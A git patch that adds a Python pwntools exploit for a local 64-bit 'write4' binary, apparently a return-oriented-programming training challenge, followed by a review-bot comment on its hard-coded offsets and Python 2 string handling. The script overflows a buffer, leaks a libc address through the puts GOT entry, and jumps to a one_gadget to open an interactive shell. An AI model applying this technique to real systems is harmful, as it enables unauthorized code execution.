From cbd9161036e82005f2cf8306bc1ce2c8fc12b5d5 Mon Sep 17 00:00:00 2001
From: Arav Garg <39301993+AravGarg@users.noreply.github.com>
Date: Sat, 28 Mar 2020 17:38:17 +0530
Subject: [PATCH] exploit for 64-bit write4 binary

---
 write4_64.py | 34 ++++++++++++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 write4_64.py

diff --git a/write4_64.py b/write4_64.py
new file mode 100644
index 0000000..9765496
--- /dev/null
+++ b/write4_64.py
@@ -0,0 +1,34 @@
+from pwn import *
+target=process('./write4')
+elf=ELF('./write4')
+libc=elf.libc
+print(target.recvuntil("already!\n> "))
+
+payload="A"*40
+
+poprdi=0x400893
+puts_plt=0x4005d0
+puts_got=0x601018
+pwnme=0x4007b5
+one_gadget=0xe652b
+
+payload+=p64(poprdi)
+payload+=p64(puts_got)
+payload+=p64(puts_plt)
+payload+=p64(pwnme)
+payload+=p64(0x0)
+
+target.sendline(payload)
+
+leak=target.recvuntil("\x0a").strip("\x0a")
+libc_puts=u64(leak+"\x00"*(8-len(leak)))
+libc_base=libc_puts-libc.symbols["puts"]
+print(hex(libc_base))
+libc_gadget=libc_base+one_gadget
+
+payload="A"*40
+payload+=p64(libc_gadget)
+
+target.sendline(payload)
+target.interactive()
+
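Review bot: The constants on the `poprdi`, `puts_plt`, `puts_got`, `pwnme` and `one_gadget` lines are undocumented, and nothing in the file states which build of `./write4` and which libc they correspond to, so a reader cannot tell why the script would fail against any other build. A header comment naming the binary and libc build the offsets belong to would make that dependency explicit, e.g. `# Offsets below are specific to one build of ./write4 and its libc; they are not portable.` The script also relies on Python 2 semantics by mixing `str` and `bytes` (`payload="A"*40` followed by `payload+=p64(...)`, and `leak+"\x00"*...`, which raise `TypeError` on Python 3), so the header should also state the interpreter and pwntools generation it targets.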